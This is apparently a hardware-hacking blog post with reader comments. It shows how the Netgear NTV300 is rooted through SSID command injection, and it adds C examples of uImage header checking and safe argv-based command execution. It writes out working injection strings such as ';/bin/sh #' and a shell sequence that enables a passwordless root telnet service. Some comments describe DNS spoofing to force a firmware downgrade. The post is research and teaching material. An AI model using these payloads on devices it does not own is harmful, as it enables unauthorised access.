Jailbreaking the NeoTV

Today we’ll be jailbreaking the Netgear NTV300 set top box…with a TV remote.

The Netgear NeoTV 300

Netgear’s NeoTV set top boxes are designed to compete with the popular Roku, and can stream video from all the usual sources (Netflix, HuluPlus, YouTube, etc.). The NTV300 is one of the least expensive NeoTV models, and while a GPL release is available, it contains only copies of the various standard open source utilities used by the NTV300. All the interesting bits – such as Netflix streaming, or the ability to build a custom firmware image – are not included.

Inside the NTV300 we find a Mediatek ARM SoC, a 128MB NAND flash chip and 256MB of RAM:

Inside the NTV300

The four pin header in the top right corner of the PCB is a serial port (115200 baud 8N1), and while it provides access to the U-Boot boot loader, it does not provide a root shell. After the system boots, it displays copious debug messages and allows for rudimentary control over the NTV300’s user interface (i.e., pressing the right arrow key on the keyboard while in the serial terminal is the same as pressing the right arrow key on the remote control). Various attempts to send BREAK and SIGINT signals have no effect; we’ll have to dig a little deeper into this one.

Luckily, the firmware updates for the NTV300 aren’t encrypted. A binwalk scan of the firmware update image reveals a few firmware headers and two SquashFS images:

DECIMAL         HEX             DESCRIPTION
-------------------------------------------------------------------------------------------------------
63944           0xF9C8          Mediatek bootloader
111840          0x1B4E0         Mediatek bootloader
128133          0x1F485         LZMA compressed data, properties: 0x80, dictionary size: 1073741824 bytes, uncompressed size: 196608 bytes
293660          0x47B1C         JFFS2 filesystem data little endian, JFFS node length: 8195
410769          0x64491         LZMA compressed data, properties: 0x02, dictionary size: 8388608 bytes, uncompressed size: 1073741824 bytes
410793          0x644A9         LZMA compressed data, properties: 0x02, dictionary size: 8388608 bytes, uncompressed size: 1073741824 bytes
410817          0x644C1         LZMA compressed data, properties: 0x02, dictionary size: 8388608 bytes, uncompressed size: 1073741824 bytes
428064          0x68820         uImage header, header size: 64 bytes, header CRC: 0x2023172F, created: Tue Oct 16 04:37:00 2012, image size: 1896744 bytes, Data Address: 0xDA00000, Entry Point: 0xDA00000, data CRC: 0xFD61E493, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name:
429156          0x68C64         LZMA compressed data, properties: 0x87, dictionary size: 250216448 bytes, uncompressed size: 14786800 bytes
445513          0x6CC49         gzip compressed data, from Unix, last modified: Sun Oct 14 23:00:19 2012, max compression
4182784         0x3FD300        Squashfs filesystem, little endian, version 4.0, compression: gzip, size: 76854395 bytes, 905 inodes, blocksize: 131072 bytes, created: Tue Oct 16 23:34:59 2012
30793205        0x1D5DDF5       PNG image, 133 x 133, 8-bit/color RGBA, non-interlaced
70987253        0x43B2DF5       JFFS2 filesystem data little endian, JFFS node length: 102880
72970663        0x45971A7       PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
73055216        0x45ABBF0       PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
73172060        0x45C845C       PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
73261506        0x45DE1C2       PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
73386095        0x45FC86F       PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
73436271        0x4608C6F       PNG image, 240 x 204, 8-bit/color RGBA, non-interlaced
78240759        0x4A9DBF7       PNG image, 780 x 870, 8-bit/color RGBA, non-interlaced
81538240        0x4DC2CC0       Squashfs filesystem, little endian, version 4.0, compression: gzip, size: 17109954 bytes, 326 inodes, blocksize: 131072 bytes, created: Thu Oct  4 01:54:51 2012
98651328        0x5E14CC0       PNG image, 1280 x 720, 8-bit/color RGB, non-interlaced
98675264        0x5E1AA40       PNG image, 720 x 480, 8-bit/color RGB, non-interlaced
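
The uImage line in the listing above carries both a header CRC and a data CRC, the fields a bootloader checks before it trusts the size and load address that follow. As an added example, not code from the original post, here is a C parser for the 64-byte U-Boot uImage header that recomputes the header CRC, refuses a header that fails it, and checks a payload against the data CRC; the header it builds is constructed for the demonstration and borrows only the 0xDA00000 load/entry address from the listing.

```c
/* Added example, not code from the original post: parse a 64-byte U-Boot
 * uImage header (the format binwalk reported at 0x68820 above), verify its
 * header CRC before trusting the size/address fields, then check a payload
 * against the data CRC. The header built in main() is constructed for this
 * demonstration; only the load/entry address is taken from the listing. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IH_MAGIC   0x27051956u  /* U-Boot image magic, stored big-endian */
#define IH_NMLEN   32
#define IH_HDR_LEN 64

struct uimage_header {
    uint32_t magic, hcrc, time, size, load, ep, dcrc;
    uint8_t  os, arch, type, comp;
    char     name[IH_NMLEN + 1];   /* NUL-terminated copy of the 32-byte name field */
};

/* Standard reflected CRC-32 (polynomial 0xEDB88320), as used by U-Boot and zlib. */
uint32_t crc32_buf(const uint8_t *p, size_t n) {
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < n; i++) {
        crc ^= p[i];
        for (int k = 0; k < 8; k++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}

static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

static void put_be32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}

/* Write a valid header for an uncompressed Linux/ARM kernel image
 * (U-Boot codes os=5, arch=2, type=2, comp=0) and fill in the header CRC. */
void uimage_build(uint8_t raw[IH_HDR_LEN], uint32_t size, uint32_t load, uint32_t ep,
                  uint32_t dcrc, const char *name) {
    size_t nl = strlen(name);
    memset(raw, 0, IH_HDR_LEN);
    put_be32(raw, IH_MAGIC);
    put_be32(raw + 12, size);
    put_be32(raw + 16, load);
    put_be32(raw + 20, ep);
    put_be32(raw + 24, dcrc);
    raw[28] = 5; raw[29] = 2; raw[30] = 2; raw[31] = 0;
    memcpy(raw + 32, name, nl > IH_NMLEN ? IH_NMLEN : nl);
    /* hcrc covers the whole header with the hcrc field itself zeroed,
     * which it still is at this point. */
    put_be32(raw + 4, crc32_buf(raw, IH_HDR_LEN));
}

/* Returns 0 on success, -1 on bad magic, -2 on header CRC mismatch. */
int uimage_parse(const uint8_t raw[IH_HDR_LEN], struct uimage_header *h) {
    uint8_t tmp[IH_HDR_LEN];
    if (be32(raw) != IH_MAGIC) return -1;
    memcpy(tmp, raw, IH_HDR_LEN);
    memset(tmp + 4, 0, 4);                       /* zero hcrc before recomputing */
    if (crc32_buf(tmp, IH_HDR_LEN) != be32(raw + 4)) return -2;
    h->magic = be32(raw);      h->hcrc = be32(raw + 4);  h->time = be32(raw + 8);
    h->size  = be32(raw + 12); h->load = be32(raw + 16); h->ep   = be32(raw + 20);
    h->dcrc  = be32(raw + 24);
    h->os = raw[28]; h->arch = raw[29]; h->type = raw[30]; h->comp = raw[31];
    memcpy(h->name, raw + 32, IH_NMLEN);
    h->name[IH_NMLEN] = '\0';
    return 0;
}

/* 1 if the payload length and CRC match what the header claims, else 0. */
int uimage_check_data(const struct uimage_header *h, const uint8_t *data, size_t len) {
    return len == h->size && crc32_buf(data, len) == h->dcrc;
}

int main(void) {
    static const uint8_t payload[] = "constructed kernel payload";   /* stand-in for a real kernel */
    uint8_t raw[IH_HDR_LEN];
    struct uimage_header h;
    uimage_build(raw, sizeof payload, 0x0DA00000u, 0x0DA00000u,
                 crc32_buf(payload, sizeof payload), "NTV300 sample");
    int rc = uimage_parse(raw, &h);
    printf("parse=%d size=%u load=0x%08X entry=0x%08X name=\"%s\" data_ok=%d\n",
           rc, (unsigned)h.size, (unsigned)h.load, (unsigned)h.ep, h.name,
           uimage_check_data(&h, payload, sizeof payload));
    raw[12] ^= 0x01;   /* flip one bit of the size field */
    printf("after tampering with the size field: parse=%d\n", uimage_parse(raw, &h));
    return 0;
}
```

One caveat worth keeping in mind: a CRC detects corruption, not modification. Anyone who can edit the image can recompute it, which is exactly why the discussion of repacking firmware later in the comments turns on recalculating checksums; only a signature over the image gives the device a reason to trust it.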

While the firmware update does not appear to contain a complete file system, most of the interesting stuff appears to be in the first SquashFS image. The /usr/local/bin/ntv300ui binary is particularly interesting as it is responsible for providing the NTV300’s user interface, including the handling of user input from both the remote control and the serial console.

Although the ntv300ui binary has been stripped, there are plenty of debug printfs that reveal the original function names:

Printf’s reveal original function names

A quick IDAPython script takes care of renaming most of these functions:

# IDAPython script (IDA 6.x-era API, Python 2) that renames stripped functions
# after the function name string ntv300ui passes to its debug printf calls.
import re
from idaapi import *
from idautils import *
from idc import *

funcs = []
# Only accept plausible identifiers as names: letters and underscores
regex = re.compile('^[a-zA-Z_]*$')

# Visit every call site of printf
for xref in XrefsTo(LocByName("printf")):
        ea = xref.frm
        found = False
        real_name = None

        # Walk back over the ten preceding 4-byte ARM instructions looking for
        # the LDRs that load printf's arguments into R0-R3
        for i in range(0, 10):
                ea -= 4
                if GetMnem(ea) == "LDR":
                        opnd = GetOpnd(ea, 0)
                        if opnd == "R1":
                                # "LDR R1, =aSomeName": drop the leading '=' and
                                # fetch the string stored at that label
                                r1_string = GetString(LocByName(GetOpnd(ea, 1)[1:]))
                                if r1_string is not None and regex.match(r1_string) and len(r1_string) > 3:
                                        real_name = r1_string
                                else:
                                        real_name = None
                        elif opnd in ["R0", "R2", "R3"]:
                                # The other argument should be a format string
                                # containing %s, where the function name is substituted
                                r3_string = GetString(LocByName(GetOpnd(ea, 1)[1:]))

                                if r3_string is not None and '%s' in r3_string:
                                        found = True
                                        break
                                else:
                                        found = False
        if found and real_name is not None:
                # Rename the enclosing function, once per function
                name = GetFunctionName(xref.frm)
                if name not in funcs:
                        funcs.append(name)
                        print(real_name)
                        MakeName(LocByName(name), real_name)

print("Renamed %d functions!" % len(funcs))

With functions properly named, reversing can begin in earnest, and the code in ntv300ui isn’t exactly confidence-inspiring. It looks like Netgear hired some Unix admins and told them to write an application in C; for example, here is how they re-implemented libc’s stat() function:

How not to stat a file

In fact, system() and popen() are used generously throughout the code. These are particularly interesting:

System calls to iwpriv

Popen calls to iwpriv

System call to wpa_cli

The SSID and encryption key values are used as part of system() and popen() calls. So where do the SSID and network key values come from? You guessed it, the user:

User controlled data!

So what happens if we tell the NTV300 to connect to an SSID named “`reboot`”?

Command injection via SSID

Connecting to `reboot`

Rebooting!
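
The bug on this page is a command line assembled from the SSID and handed to system() or popen(), which means /bin/sh, not iwpriv, gets the first look at whatever the user typed. As an added example that is not code from ntv300ui (the iwpriv invocation and the ra0 interface name are assumed for illustration; the real command strings are only visible in the screenshots above), here is that pattern next to the form that passes the SSID as a single argv entry with no shell in between, plus an audit check that flags SSIDs containing shell metacharacters:

```c
/* Added example, not code from ntv300ui: the same user-supplied SSID handed
 * to a helper program the vulnerable way (a command line for /bin/sh) and
 * the safe way (an argv array passed straight to execv). The iwpriv command
 * form and the "ra0" interface name are assumed for illustration; the real
 * strings are only visible in the screenshots above. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define SSID_MAX 32   /* an 802.11 SSID is 0..32 octets of arbitrary bytes */

/* Vulnerable pattern: the SSID is spliced into a command string that
 * system()/popen() give to /bin/sh, so backticks, ';', '#', '$' and friends
 * are interpreted by the shell. This function only builds the string and
 * never runs it; it exists to show what the shell would receive. */
int build_shell_cmd(const char *ssid, char *out, size_t outlen) {
    int n = snprintf(out, outlen, "iwpriv ra0 set SSID=%s", ssid);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Audit/detection helper: does the SSID contain bytes /bin/sh treats
 * specially? A legitimate SSID may contain any of these, so rejecting them
 * is not the fix, but it is a useful log/alert condition. */
int ssid_has_shell_metachars(const char *ssid) {
    return strpbrk(ssid, "`$;|&<>()#'\"\\\n* ?~") != NULL;
}

/* Safe pattern: build argv for the helper. No shell is involved, so the SSID
 * lands in the helper's argv exactly as the user typed it, whatever it
 * contains. ssid_buf must outlive argv. Returns -1 if the SSID is too long. */
int build_argv(const char *ssid, char *ssid_buf, size_t buflen, const char *argv[5]) {
    size_t n = strlen(ssid);
    if (n > SSID_MAX || n + sizeof "SSID=" > buflen) return -1;
    snprintf(ssid_buf, buflen, "SSID=%s", ssid);
    argv[0] = "/sbin/iwpriv"; argv[1] = "ra0"; argv[2] = "set";
    argv[3] = ssid_buf;       argv[4] = NULL;
    return 0;
}

/* Execute an argv array directly (fork + execv) and return its exit status. */
int run_argv(const char *argv[]) {
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execv(argv[0], (char *const *)argv);
        _exit(127);                /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed inputs: a normal SSID and the two strings from the post above. */
    const char *samples[] = { "HomeNetwork", "`reboot`", "\";/bin/sh #" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        char cmd[128], ssid_buf[64];
        const char *argv[5];
        build_shell_cmd(samples[i], cmd, sizeof cmd);
        printf("SSID %-14s shell sees: %s\n", samples[i], cmd);
        printf("%-19s metachars: %d\n", "", ssid_has_shell_metachars(samples[i]));
        if (build_argv(samples[i], ssid_buf, sizeof ssid_buf, argv) == 0)
            printf("%-19s execv argv[3]: %s  (run_argv(argv) would exec it with no shell)\n",
                   "", argv[3]);
    }
    return 0;
}
```

The point of build_argv is not to sanitize the SSID but to make sanitizing unnecessary: execv hands the helper an argument vector, so a backtick or semicolon is just another byte. The metacharacter check is still worth keeping as a log or alert condition, but rejecting those bytes outright would break legitimate networks, since an SSID is 32 arbitrary octets.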

Sweet! Since we are already connected to the serial port, it would be nice if we could spawn a shell for ourselves on the serial terminal. Let’s try:

Connecting to “;/bin/sh #

Shell successfully spawned on the serial terminal

While this provides us with a minimalist shell, it is not very user friendly. There is no command echoing, and a ton of debug output is intermixed with the command output. Let’s see if we can find an easier way to get a shell – preferably one that doesn’t involve taking the device apart.

Examining the file system on the live device, there are plenty of files and directories that were not included in the firmware update file. Checking out some of the start up scripts, we find this juicy piece of code in /root/rc.user:

if [ -f /mnt/ubi_boot/mfg_test/enable ]; then
        echo "[WNC RD] Maufacturing Mode"
        #chmod +x /mnt/ubi_boot/mfg_test/*.sh

        #if [ ! -f /mnt/ubi_boot/mfg_test/disable_app_player ]; then
        #       #(sleep 3; /usr/local/mfg_test/play_power_on.sh) &
        #       /usr/local/mfg_test/play_power_on.sh &
        #fi

        echo "[WNC RD] Set ip forward"
        echo 1 > /proc/sys/net/ipv4/ip_forward

        #chmod +x /mnt/ubi_boot/mfg_test/reset
        /usr/local/mfg_test/reset &

        echo "[WNC RD] Set Ethernet Fixed IP: [192.168.0.100]"
        #ifconfig eth0 192.168.0.100 netmask 255.255.255.0 up
        echo -n 0 > /mnt/ubi_boot/settings/NetworkInterface
        echo -n 1 > /mnt/ubi_boot/settings/IpMode
        echo -n 192.168.0.100 > /mnt/ubi_boot/settings/IpAddress
        echo -n 255.255.255.0 > /mnt/ubi_boot/settings/SubNetMask
        echo -n 0.0.0.0 > /mnt/ubi_boot/settings/Gateway
        echo -n 0.0.0.0 > /mnt/ubi_boot/settings/PrimaryDNS
        echo -n 0.0.0.0 > /mnt/ubi_boot/settings/SecondaryDNS

        sync

        echo "[WNC RD] enable telnetd"
        inetd -d &
        (sleep 5; ifconfig eth0 192.168.0.100 netmask 255.255.255.0 up; ping -c 1 192.168.0.10; ping -c 1 192.168.0.11) &

else
        echo "[WNC RD] Normal mode"

        # XBMC Server
        if [ -f /usr/local/bin/xbeventd -a -e /mnt/fifo ]; then
                /usr/local/bin/xbeventd /mnt/fifo &
        fi

        if [ -f /usr/local/bin/xbhttpd ]; then
                /usr/local/bin/xbhttpd
        fi

        if [ -f /usr/local/bin/xbmdns ]; then
                /usr/local/bin/xbmdns &
        fi

fi

It checks to see if the /mnt/ubi_boot/mfg_test/enable file exists, and if so, it fires up a telnet service (among other things). However, the mfg_test directory doesn’t exist at all on the production system:

Directory listing of /mnt/ubi_boot/

But with the SSID command injection vulnerability, we can easily create it. The commands to create the file are too long to fit into the restricted 32-character SSID input field, so we’ll echo them piecemeal into a shell script and then execute that script:

cd /mnt/ubi_boot

mkdir mfg_test

cd mfg_test

echo >> enable

/bin/sh /tmp/a

Finally, we power cycle the box. If successful, the NTV300’s IP address should have been set statically by the /root/rc.user script upon reboot. Let’s check:

Static IP settings

We can now change the DHCP settings back to dynamic, connect the NTV300 to our access point and telnet in (username root, no password):

Root telnet shell

Rooted with nothing but the remote control it came with. That’s all folks.


125 Responses to Jailbreaking the NeoTV

  1. No One says:

    Do you know if that’s also true for the other NeoTV models?
    Is it possible to modify the system to make jailbreak permanent?

    I’d like a programmable set top box that can play Hulu & Netflix – this seems to fit the bill. Do you know if I get the NeoTV Max (the one with analog outputs and qwerty remote), will it blend? (that is, jailbreak?)

    • Craig says:

      I have no idea if this affects other NeoTV models. It wouldn’t surprise me if it did (vendors tend to re-use code a lot), but the ntv300ui binary seemed specific to the NTV300 so maybe not.

      The above jailbreak is permanent for the NTV300. The created file persists across reboots and ensures that the telnet server is started on every boot. You could add your own files/binaries to the system and they should remain across a reboot as well. Note that file system modifications do appear to be removed when you reset the device though.

  2. Kenny says:

    I must be missing something here, but why not just run ‘inetd -d &’, maybe with nohup if required.

    • Craig says:

      Well, two reasons.

      First, I tried that. :) Although inetd would run, for whatever reason, even with the ampersand inetd never returned, so the NeoTV would think that it was permanently stuck trying to “connect” to the AP, and it wouldn’t let me connect to my actual AP in order to telnet in. If you look at the screenshot from when I started the shell on the serial terminal, it prints out a message saying that the shell has no job control, so that might be the culprit. I didn’t really look into it further. You can probably get around this by plugging in a wired connection to the NeoTV’s ethernet jack.

      Second, creating the mfg_test/enable file ensures that the telnet server is started every time the device boots up, so I don’t have to keep re-running inetd each time I reboot the system.

      • asdafa says:

        Couldn’t you create the file by using the unfriendly shell spawned before?

        • Craig says:

          Technically yes, but it was a very unfriendly shell. Random characters typed into the shell would get dropped (presumably because the ntv300ui application was also reading keystrokes from the serial port) and with no command echoing there was no way to know if that had happened until after you’d typed out your command and hit enter.

          Also, I really wanted a way to do it without having to open the case and connect to the serial port since that would make it easier for others to duplicate if they desired. Plus I really liked the idea of being able to root the box using *only* the remote control. :D

          Ultimately, once you have command injection as root, what you do from there is just details and personal preference. Curl is already installed, so you could just as easily have curl download something from a Web server and execute that for example.

  3. Pingback: Rooting a NeoTV set top box from the couch | Siecurity.com

  4. Pingback: Belgaum news | About Belgaum | Belgaum information | Belgaum district | Belgaum city | Belgaum Hotels | Belgaum People | Belgaum tourism | Belgaum entertainment | Belgaum students | Inside facebook | Hack | make use of | technical news | | Rooting a NeoTV

  5. Pingback: Indagadores |Seguridad informatica |Seguridad en internet » Enraizamiento un decodificador NeoTV parte superior del sofá

  6. Essobi says:

    With just a remote, and full of win. :D

  7. AC says:

    The best idea may be to not buy crap products that are broken by design. The perverted locked-down-control-freak-assholes don’t deserve our money.

    Fuck ‘em.

  8. Pingback: Włamał się do odtwarzacza. Pilotem. Przez nazwę sieci WiFi. | Zaufana Trzecia Strona

  9. doesntmatter says:

    what does one do with a rooted NeoTV?

    • Craig says:

      I dunno, I just like breaking things. :)

      I suppose you’d do whatever it is you’d like to do with a $50 4″x4″ Linux box with wifi, ethernet, 1080p HDMI and a netflix player pre-installed.

  10. Hehe Well done Craig and keep breaking things

  11. Justathought says:

    Instead of doing all that, just get a raspberry pi and install raspbmc…..

    • Craig says:

      Depends on your needs; the main reason I was looking at the NeoTV is because it has Netflix support, which is something open source alternatives all currently lack. Although I have been meaning to look into the possibility of taking the netflix binaries off the NeoTV and putting them on a raspi.

      • Chris Brunner says:

        Craig, any word on this? Have you tried tinkering with the netflix binary at all?

        • Craig says:

          The netflix binary appears to be heavily tied to the ntv300ui binary – if the ntv300ui process is not running, the netflix binary will just sit there and hang. There are also several DRM files referenced by the netflix binary that are on the system, but not included in the firmware update, so these may be dynamically generated. I haven’t really had time to take a serious look at it, but if you are just trying to get Netflix running on your Linux PC, this is probably a better bet.

  12. Pingback: Security News #0×26- The Frankenstorm Edition « CyberOperations

  13. ozzra says:

    Can’t believe they put a backtick onto an on screen keyboard! :D
    (Apparently not even in confusion with the apostrophe, which is present as well.) I cannot imagine what an average user would want that for.

  14. Pingback: HR7 – Noname | hard reset – der Technik-Podcast

  15. Pingback: Wordpress Theme Update — Teil 1 | .tuxfrickler

  16. Victor says:

    Most of the functions implemented using system come from Mediatek code, not netgear. So luckily, you can use this jailbreaking method on some other products with Mediatek SoC ;)

  17. Gopi says:

    Hi Craig

    Is there a way to jailbreak the NTV200? Even though it is called NeoTV, it uses a BCM7615.

    • Craig says:

      I haven’t looked at the NTV200; it’s MIPS based, so it may use a completely different code base than the NTV300. If you have a link for a firmware update I’d be happy to take a look at it.

      • DB says:

        Craig, here’s the image. Thanks for looking.

        • Craig says:

          The firmware image is just a tarball, but the extracted parts (kernel, filesystem, etc) appear to be encrypted and signed. I’ll have to take a closer look at it.

      • DB says:

        Craig, would you also kindly advise how we may go about manually updating the NTV200’s firmware if we have a .fwu image, instead of the automatic updates that are done by the NTV200 itself? Thanks a lot! – DB

        • Craig says:

          I don’t think there is an official way to perform manual firmware upgrades. On boot up the devices phone home to see if there are any firmware updates available, and if so, they upgrade themselves. The connections to Netgear’s servers aren’t encrypted though, so you could redirect the DNS lookups to a local server of your own and serve up firmware upgrades from there.

  18. Alexander says:

    Hi Craig! Good article as always.
    I always thought files you create on embedded systems are deleted upon reboot, as I thought they reside in RAM, and all permanent files should be flashed as part of the filesystem image.
    Could you cover this topic a bit: what determines whether new files survive a reboot or not?
    Thanks and keep posting.

    • Craig says:

      It depends on the filesystem(s) used by the embedded device. SquashFS and CramFS are read-only, so you can’t write data to them at all. RamFS is obviously writable, but gets blown away on a reboot. Other file systems, like JFFS2, EXT2, and Minix, are full read/write file systems and retain data across a reboot.

      It is not uncommon for devices to use SquashFS/CramFS for the main system files, and have some other directories mounted as JFFS2 so that they can save configuration data there (DD-WRT has separate SquashFS/JFFS2 partitions for example).
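
The reply above explains why a created file may or may not survive a reboot: it depends on which filesystem holds the path. As an added example that is not part of the post or its comments, here is a C routine that reads a /proc/mounts table, finds the mount holding a path (the deepest mount point wins, and a later mount on the same point shadows an earlier one) and classifies it; the mount table embedded in it is constructed for illustration, not taken from the NTV300.

```c
/* Added example, not code from the post or its comments: read a /proc/mounts
 * table, find the mount that holds a given path, and classify whether files
 * written there persist across a reboot, following the distinctions in the
 * reply above. SAMPLE_MOUNTS is constructed for illustration and is not the
 * NTV300's real mount table. */
#include <stdio.h>
#include <string.h>

enum persistence { FS_UNKNOWN = 0, FS_READONLY, FS_VOLATILE, FS_PERSISTENT };

static const char SAMPLE_MOUNTS[] =
    "rootfs / rootfs rw 0 0\n"
    "/dev/mtdblock4 / squashfs ro,relatime 0 0\n"
    "tmpfs /tmp tmpfs rw,nosuid 0 0\n"
    "/dev/mtdblock6 /mnt/ubi_boot jffs2 rw,relatime 0 0\n";

/* Classify a filesystem type: squashfs/cramfs cannot be written at all,
 * tmpfs/ramfs lose everything at reboot, flash/disk filesystems keep it. */
enum persistence classify_fs(const char *type) {
    if (!strcmp(type, "squashfs") || !strcmp(type, "cramfs")) return FS_READONLY;
    if (!strcmp(type, "tmpfs") || !strcmp(type, "ramfs")) return FS_VOLATILE;
    if (!strcmp(type, "jffs2") || !strcmp(type, "ubifs") || !strcmp(type, "minix") ||
        !strcmp(type, "ext2") || !strcmp(type, "ext3") || !strcmp(type, "ext4"))
        return FS_PERSISTENT;
    return FS_UNKNOWN;
}

/* Each /proc/mounts line is "device mountpoint fstype options dump pass".
 * The deepest mount point that is a prefix of path (on a '/' boundary) wins;
 * among equal mount points the later line wins, since a later mount shadows
 * an earlier one. Copies the fstype into type_out; returns 1 if found. */
int mount_type_for_path(const char *mounts, const char *path, char *type_out, size_t outlen) {
    size_t best = 0;
    int found = 0;
    const char *line = mounts;
    while (*line) {
        char buf[256], dev[64], mnt[128], type[32];
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        if (len >= sizeof buf) len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';
        if (sscanf(buf, "%63s %127s %31s", dev, mnt, type) == 3) {
            size_t ml = strlen(mnt);
            if (strncmp(path, mnt, ml) == 0 &&
                (ml == 1 || path[ml] == '\0' || path[ml] == '/') && ml >= best) {
                best = ml;
                found = 1;
                snprintf(type_out, outlen, "%s", type);
            }
        }
        if (!eol) break;
        line = eol + 1;
    }
    return found;
}

/* Convenience wrapper: persistence class of the filesystem holding path. */
enum persistence path_persistence(const char *mounts, const char *path) {
    char type[32];
    return mount_type_for_path(mounts, path, type, sizeof type) ? classify_fs(type) : FS_UNKNOWN;
}

int main(void) {
    static const char *labels[] = { "unknown", "read-only", "lost at reboot", "persistent" };
    const char *paths[] = { "/usr/local/bin/ntv300ui", "/tmp/a", "/mnt/ubi_boot/mfg_test/enable" };
    for (size_t i = 0; i < sizeof paths / sizeof paths[0]; i++) {
        char type[32] = "?";
        mount_type_for_path(SAMPLE_MOUNTS, paths[i], type, sizeof type);
        printf("%-32s %-9s %s\n", paths[i], type, labels[path_persistence(SAMPLE_MOUNTS, paths[i])]);
    }
    return 0;
}
```

On a live system the same function can be fed the contents of /proc/mounts instead of SAMPLE_MOUNTS: a path that resolves to squashfs or cramfs cannot be written at all, tmpfs or ramfs will not survive a power cycle, and only a flash or disk filesystem such as jffs2 keeps the change.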

  19. David says:

    The backquote trick doesn’t work on the NTV200 :(

  20. Robert Sisson says:

    What can you do with it after rooting it?

  21. Ritz says:

    Hi Craig, please suggest something for the NTV200. I guess a lot of folks are looking forward to having some solution, as most of them got it pretty cheap a week back.
    Excited to hear back from you.

    • Craig says:

      I haven’t had time to take a serious look at it. Current NTV200 firmware updates are encrypted and I don’t have an NTV200 myself. However, Stewart posted a link to an older firmware version above, which is not encrypted, so that will be a good place to start looking. Besides extracting the file system from the firmware though, I haven’t done much with it.

  22. Sam says:

    Very nice article. Do you think there is a way to make a custom firmware update that will allow that box to play video from online websites like http://www.chooseandwatch.com/ or some other website that has link for online TVs?
    Is there a way to modify the box to play video from a Windows Media server? The links are mms://. There are many web sites offering free online TV, and this device would be a great alternative for people who want to watch it on their TVs instead of on computer monitors.

  23. h3ck says:

    you wrote “;/bin/sh #

    2 questions

    1. Why does it not end with a ”?

    2. Why does it end with a #?

    thanks for the reply

    • Craig says:

      It does not end with a ” because it ends with a #. The # is a comment character in the shell, so anything after the # is treated as a comment and ignored.

  24. JimmyDB says:

    @Craig: I have a NeoTV300 and a NeoTV300SL (Max). I tried the reboot command as a test on my NeoTV300 and it did not work; I have not tried on the Max yet. If interested, I can read/post the firmware version.

    Can you confirm this still works after the latest updates?

    Do I have to have a router with the proper SSIDs?
    I did set one up with reboot as the name, but it still didn’t work. I’m just wondering as it relates to the rest of the commands.

    • Craig says:

      It looks like Netgear has pushed out a new firmware version. I’m downloading it now to take a look.

      Worst case scenario, it looks like tricking the NTV300 into downgrading the firmware should be pretty easy – it calls out to a hard-coded site to look for firmware updates, and none of the traffic is encrypted. Simple DNS spoof should take care of it.

      And no, the SSIDs you specify don’t have to actually exist – at least they didn’t in the firmware version I examined here.

      • Angel says:

        Hi Craig
        How does this DNS spoofing work, and how do you do it?
        I just bought one of these boxes, hooked it up, and it updated the software. What is the step-by-step for downgrading the software on the NeoTV? I am not very tech savvy, but I am willing to learn.

  25. Warner Losh says:

    So how hard would it be to trick it into using an NFS mount instead of a USB drive for its local media?

  26. Warner Losh says:

    Also, if one can read the firmware file systems, can’t one extract them and add/subtract things from them to create your own custom firmware? Possibly with DNS Spoofing to get it to do the right thing and go to a local server?

    • Craig says:

      Yes, but one would have to reverse the format header in order to re-calculate any checksum fields. This also assumes that the firmware isn’t signed; I haven’t seen anything that leads me to believe that it is, but the other NTV models have signed firmware.

  27. Warner Losh says:

    This image is the latest update, and the prior link is now gone… I can’t seem to bring it up without upgrading to this version…

  28. Warner Losh says:

    DECIMAL HEX DESCRIPTION
    -------------------------------------------------------------------------------------------------------
    63944 0xF9C8 Mediatek bootloader
    111840 0x1B4E0 Mediatek bootloader
    128133 0x1F485 LZMA compressed data, properties: 0x80, dictionary size: 1073741824 bytes, uncompressed size: 196608 bytes
    293660 0x47B1C JFFS2 filesystem data little endian, JFFS node length: 8195
    410769 0x64491 LZMA compressed data, properties: 0x02, dictionary size: 8388608 bytes, uncompressed size: 1073741824 bytes
    410793 0x644A9 LZMA compressed data, properties: 0x02, dictionary size: 8388608 bytes, uncompressed size: 1073741824 bytes
    410817 0x644C1 LZMA compressed data, properties: 0x02, dictionary size: 8388608 bytes, uncompressed size: 1073741824 bytes
    428064 0x68820 uImage header, header size: 64 bytes, header CRC: 0x61030CBE, created: Tue Oct 30 04:45:46 2012, image size: 1896992 bytes, Data Address: 0xDA00000, Entry Point: 0xDA00000, data CRC: 0x4F011583, OS: Linux, CPU: ARM, image type: OS Kernel Image, compression type: none, image name:
    429156 0x68C64 LZMA compressed data, properties: 0x87, dictionary size: 250216448 bytes, uncompressed size: 14786800 bytes
    445513 0x6CC49 gzip compressed data, from Unix, last modified: Tue Oct 30 04:44:21 2012, max compression
    4183248 0x3FD4D0 Squashfs filesystem, little endian, version 4.0, compression: gzip, size: 76879771 bytes, 906 inodes, blocksize: 131072 bytes, created: Tue Oct 30 05:28:46 2012
    30794485 0x1D5E2F5 PNG image, 133 x 133, 8-bit/color RGBA, non-interlaced
    46646747 0x2C7C5DB gzip compressed data, ASCII, extra field, has comment, comment, encrypted, last modified: Fri Aug 29 04:32:12 2008
    63725129 0x3CC5E49 JFFS2 filesystem data little endian, JFFS node length: 531211
    70942504 0x43A7F28 JFFS2 filesystem data little endian, JFFS node length: 102880
